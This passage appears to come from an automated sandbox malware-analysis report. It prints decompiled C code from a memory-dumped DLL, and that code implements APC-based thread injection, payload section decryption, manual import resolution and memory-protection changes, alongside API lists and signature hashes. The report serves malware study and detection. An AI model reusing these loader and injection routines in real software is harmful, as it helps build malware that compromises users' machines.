					if(_t10 == 0) {
						__eflags =  *0x6d64418c;
						if( *0x6d64418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d644198;
								if( *0x6d644198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d64418c);
						}
						HeapDestroy( *0x6d644190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d644188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d644190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d6441b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D641CA4(E6D641D32, E6D641EE0(_a12, 1, 0x6d644198, _t41));
							 *0x6d64418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6D644188), ref: 6D641E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D641E3B

Part of subcall function 6D641CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D644198,6D641E74), ref: 6D641CBB
Part of subcall function 6D641CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D641CD0
Part of subcall function 6D641CA4: GetLastError.KERNEL32(00000000), ref: 6D641CDB
Part of subcall function 6D641CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D641CE5
Part of subcall function 6D641CA4: CloseHandle.KERNEL32(00000000), ref: 6D641CEC
Part of subcall function 6D641CA4: SetLastError.KERNEL32(00000000), ref: 6D641CF5

InterlockedDecrement.KERNEL32(6D644188), ref: 6D641E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6D641EA8
CloseHandle.KERNEL32 ref: 6D641EC4
HeapDestroy.KERNEL32 ref: 6D641ED0

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 224ef3ca8bf037041dfcd2f2905b5c307a5dbefd15a9cf4933b6dfbb8a12170f
Instruction ID: c24e609894ab569817155d56abb1fbce012a0125bf7752f0b7290e077295bec1
Opcode Fuzzy Hash: 224ef3ca8bf037041dfcd2f2905b5c307a5dbefd15a9cf4933b6dfbb8a12170f
Instruction Fuzzy Hash: 8D216375A40206EBCB10AFAACC85B7B7BB8FB6E7A4711C129E505D3140E7B89994CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D641CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d6441cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d641cbb
0x6d641cc1
0x6d641cc5
0x6d641cd0
0x6d641cd8
0x6d641ce1
0x6d641ce5
0x6d641cec
0x6d641cf3
0x6d641cf5
0x6d641cfb
0x6d641cd8
0x6d641cff

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D644198,6D641E74), ref: 6D641CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D641CD0
GetLastError.KERNEL32(00000000), ref: 6D641CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6D641CE5
CloseHandle.KERNEL32(00000000), ref: 6D641CEC
SetLastError.KERNEL32(00000000), ref: 6D641CF5

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 449769e967f6d0d0ec88419ee939830e0194b7c9b477119e104a127e09118c8f
Instruction ID: 1223535de57d9b0205c45c720c518ca502104675c5d99a13959a02a1214cdf7f
Opcode Fuzzy Hash: 449769e967f6d0d0ec88419ee939830e0194b7c9b477119e104a127e09118c8f
Instruction Fuzzy Hash: FBF08232244621FBDB217FA28C0CF5B7F79FF0AB11F00C604F61591140C72588918B95

Uniqueness

Uniqueness Score: -1.00%

Function 6D672FCC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,000031E4,6D792898), ref: 6D67302B

Strings

;1, xrefs: 6D67300E, 6D67309F
1, xrefs: 6D672FE0
;1, xrefs: 6D67303B

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: ;1$;1$1
API String ID: 544645111-3098204872
Opcode ID: 52fd0e30c2149a16a8cb89ac45313c894fe2bc1546a26c19883d908a1d887054
Instruction ID: d5867ce4cc7b734bc07f794f607014540b70a1c2d313a5df4f7ec9ce761f546a
Opcode Fuzzy Hash: 52fd0e30c2149a16a8cb89ac45313c894fe2bc1546a26c19883d908a1d887054
Instruction Fuzzy Hash: DD312F7190029AAFCF14CFAED450ABCBBF0FF06309B08459AD475D7282E3389255EB64

Uniqueness

Uniqueness Score: -1.00%

Function 6D6415A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D6415A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d6441b0;
				_t39 = E6D641A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d6441cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d645137; // 0x6d645137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D641D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d6441cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D6415F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D6417EC), ref: 6D64168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D6416A6

Strings

Mar 26 2021, xrefs: 6D64162B

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 259b8453c2a523f9e91c7aac9f5710d496f6ed32235d9c4558fa362f731f6bba
Instruction ID: 8d6cf667ee42814e40dfd3baf69d1e12f448864ea01c51e567b690f0be6d11d9
Opcode Fuzzy Hash: 259b8453c2a523f9e91c7aac9f5710d496f6ed32235d9c4558fa362f731f6bba
Instruction Fuzzy Hash: E431A171E4021AAFCF00DF99C880BEEBBB9FF49314F14C129E504A7240D775AA558F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D641D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D641D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D6417A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d641d3b
0x6d641d40
0x6d641d4e
0x6d641d53
0x6d641d53
0x6d641d59
0x6d641d5e
0x6d641d62
0x6d641d66
0x6d641d66
0x6d641d70
0x6d641d79

APIs

GetCurrentThread.KERNEL32 ref: 6D641D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D641D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D641D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D641D66

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1d8b4385edc55e9bd8bdf85b7dc0dfa8ed9793c8105bb8d30334d093e78092d2
Instruction ID: 2dc0cb9a874e38038bb1570cba7ba1f0b560fa106bd6822acc42036f3bc26ab0
Opcode Fuzzy Hash: 1d8b4385edc55e9bd8bdf85b7dc0dfa8ed9793c8105bb8d30334d093e78092d2
Instruction Fuzzy Hash: F8E022303453112BD3122A2A4C88F6B7B6CDF9B331B02C335F624C21D0CB988C198AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D641030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D641030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6d6441cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6d64103a
0x6d641047
0x6d64104d
0x6d641059
0x6d641069
0x6d64106b
0x6d641073
0x6d641108
0x6d64110f
0x00000000
0x00000000
0x00000000
0x6d641079
0x6d641079
0x6d641079
0x6d64107d
0x00000000
0x00000000
0x6d641089
0x6d64108d
0x6d6410b1
0x6d6410b5
0x6d6410c9
0x6d6410c9
0x6d6410cf
0x6d6410de
0x6d6410e2
0x6d6410ea
0x6d6410ea
0x6d6410f2
0x6d6410f5
0x6d641102
0x00000000
0x00000000
0x00000000
0x00000000
0x6d641102
0x6d6410bd
0x6d6410c1
0x6d6410c7
0x00000000
0x00000000
0x00000000
0x6d6410c7
0x6d641095
0x6d641099
0x6d6410a3
0x6d64109b
0x6d64109b
0x6d64109b
0x00000000
0x6d641099
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6D641069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D6410DE
GetLastError.KERNEL32 ref: 6D6410E4

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 8584d84f47cd58f9d24d97308323f90155084d2363f84042ca69cd069b6256c4
Instruction ID: 632876acfcc20b99b3ee7ec5188c9e7917c364990955a9da7ebb8be7fe08ae23
Opcode Fuzzy Hash: 8584d84f47cd58f9d24d97308323f90155084d2363f84042ca69cd069b6256c4
Instruction Fuzzy Hash: 5C213D3180020BEFCB14DF95C881AAAF7F9FF08759F00C95AD01697541E7B8A6A9CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6D6416EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6D6416EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6d6441c4);
				_push(1);
				_push( *0x6d6441d0 + 0x6d645089);
				 *0x6d6441c0 = 0xc;
				 *0x6d6441c8 = 0; // executed
				L6D6414D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6D641112( &_v44,  &_v28,  *0x6d6441cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6d6441b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6D641979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6d6441b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6D642112(_t40, _t30 + 4);
					}
				}
				_t23 = E6D641236(_v44); // executed
				goto L7;
			}

0x6d6416fe
0x6d6416ff
0x6d641704
0x6d64170c
0x6d64170d
0x6d641717
0x6d64171d
0x6d641726
0x6d64172b
0x6d641749
0x6d64179e
0x6d64179f
0x6d6417a0
0x6d6417a0
0x6d641751
0x6d641757
0x6d641765
0x6d641769
0x6d641770
0x6d641778
0x6d64177c
0x6d64177e
0x6d64178d
0x6d641780
0x6d641786
0x6d641786
0x6d64177e
0x6d641795
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6D6441C4,00000000), ref: 6D64171D
lstrlenW.KERNEL32(?,?,?), ref: 6D641751

Part of subcall function 6D641979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?,?), ref: 6D641986
Part of subcall function 6D641979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D64199C
Part of subcall function 6D641979: _snwprintf.NTDLL ref: 6D6419C1
Part of subcall function 6D641979: CreateFileMappingW.KERNELBASE(000000FF,6D6441C0,00000004,00000000,?,?), ref: 6D6419E6
Part of subcall function 6D641979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D6419FD
Part of subcall function 6D641979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A), ref: 6D641A32

ExitThread.KERNEL32 ref: 6D6417A0

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: f113be14503336f9d867fd8c0faa731fe4bd21cfe8203df50dd7dcfb91c50ac4
Instruction ID: 7e50825dd8c5bb272e63c2c18477e6e8210a9cf39c1af5e1983d99d12382a592
Opcode Fuzzy Hash: f113be14503336f9d867fd8c0faa731fe4bd21cfe8203df50dd7dcfb91c50ac4
Instruction Fuzzy Hash: CB11BE72118201ABDB01EF65C845EAB7BFCBB5D754F01C916F208D7140D7B4E5948791

Uniqueness

Uniqueness Score: -1.00%

Function 6D641F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d6441cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D641F69
GetProcAddress.KERNEL32(?,00000000), ref: 6D641FDB

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 21c97543d06e2b86bc253e60592cd840f3f528e71f684182c7b62b9417dfbdb8
Instruction ID: 787c58b37acdaad4ee6845fd5ff960a8084edc6ab0f289c73104f2c85dbb9c3f
Opcode Fuzzy Hash: 21c97543d06e2b86bc253e60592cd840f3f528e71f684182c7b62b9417dfbdb8
Instruction Fuzzy Hash: 6F3103B1A0020ADFDB55CF99C880BAEB7F4BF49754B20C16AE811EB240E778DA51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6D641C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D641C12(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6D641112( &_v8,  &_v12,  *0x6d6441cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6D641BCB(_t22, _v8,  *0x6d6441cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E6D641566(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6d644190, 0, _v8);
				}
				return _t25;
			}

0x6d641c12
0x6d641c15
0x6d641c16
0x6d641c2c
0x6d641c35
0x6d641c3a
0x6d641c53
0x6d641c3c
0x6d641c4f
0x6d641c4f
0x6d641c57
0x6d641c61
0x6d641c69
0x6d641c71
0x6d641c73
0x6d641c73
0x6d641c71
0x6d641c83
0x6d641c83
0x6d641c8e

APIs

StrStrIA.KERNELBASE(00000000,6D641810,?,6D641810,?,00000000,00000000,?,?,?,6D641810), ref: 6D641C69
HeapFree.KERNEL32(00000000,?,?,6D641810,?,00000000,00000000,?,?,?,6D641810), ref: 6D641C83

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bf3dc581342680b285774686a6c5c1035cc6472aa990d0a23ef3f61e5cde057b
Instruction ID: 93506fac74884b7e1ec2b63871dae2caf731a02b5d1508e5b20efeef2dc785f7
Opcode Fuzzy Hash: bf3dc581342680b285774686a6c5c1035cc6472aa990d0a23ef3f61e5cde057b
Instruction Fuzzy Hash: F1018476900115ABCB019FA6CE40EAF77BDAB8D640F11C162E605E3100E779DA1097A4

Uniqueness

Uniqueness Score: -1.00%

Function 6D6740F0, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6D673CB9,?), ref: 6D674105

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9f2c6fd79c695cd129b6db8b47a92bbfa8acc0dddd6259858928e58d873b89ea
Instruction ID: 0bc18035da2cac5f943cf60fbb82ebdd0ab5881f69bd0006e3766b2b25bacb90
Opcode Fuzzy Hash: 9f2c6fd79c695cd129b6db8b47a92bbfa8acc0dddd6259858928e58d873b89ea
Instruction Fuzzy Hash: 89D05E725543495BDB10AE719C097627BFC9389799F104435F90DCA140E674D591D500

Uniqueness

Uniqueness Score: -1.00%

Function 6D675C89, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6D675C8B

Part of subcall function 6D675C17: RtlEncodePointer.NTDLL(00000000,?,6D675C90,00000000,6D678345,6D794110,00000000,00000314,?,6D675ADF,6D794110,6D6480A8,00012010), ref: 6D675C7E

Memory Dump Source

Source File: 00000004.00000002.518008117.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: fda2fa7484b98ce6b1cfe75b2e1cbc23e42b685d15bc1c03f6bedac8f0ab8af6
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6D641236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6D641236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6d6441cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d6441cc - 0x63698bc4 &  !( *0x6d6441cc - 0x63698bc4);
				_t18 = E6D641AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d6441cc - 0x63698bc4 &  !( *0x6d6441cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d6441cc - 0x63698bc4 &  !( *0x6d6441cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6D6414DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6D641F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6D641030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
